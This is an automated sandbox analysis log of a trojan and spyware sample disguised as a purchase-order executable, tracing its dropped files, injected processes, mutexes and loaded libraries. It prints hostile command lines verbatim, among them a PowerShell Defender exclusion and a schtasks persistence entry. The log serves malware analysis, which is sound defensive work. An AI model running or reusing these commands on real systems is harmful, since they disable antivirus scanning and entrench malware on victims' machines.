Source: rmiregistry.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVDllSurrogate32.exe.3.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@32/146@26/10

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0044CE7A GetLastError,FormatMessageW,

0_2_0044CE7A

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0043AB84
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0043B134

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0044E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0044E1FD

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00446532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00446532

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0045C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0045C18C

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0040406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0040406B

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00ADCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00ADCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Jump to behavior

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

File created: C:\Users\user\AppData\Roaming\90fdfad63d8f4c72.bin

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c72-inf
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c7273779169-b
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c729ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

File created: C:\Users\user\AppData\Local\Temp\aut7AD4.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: server01.exe, 0000000F.00000002.3345167854.000000000413D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.0000000003220000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000320C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000322D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.00000000031EE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

File read: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Section loaded: dnsapi.dll	Jump to behavior
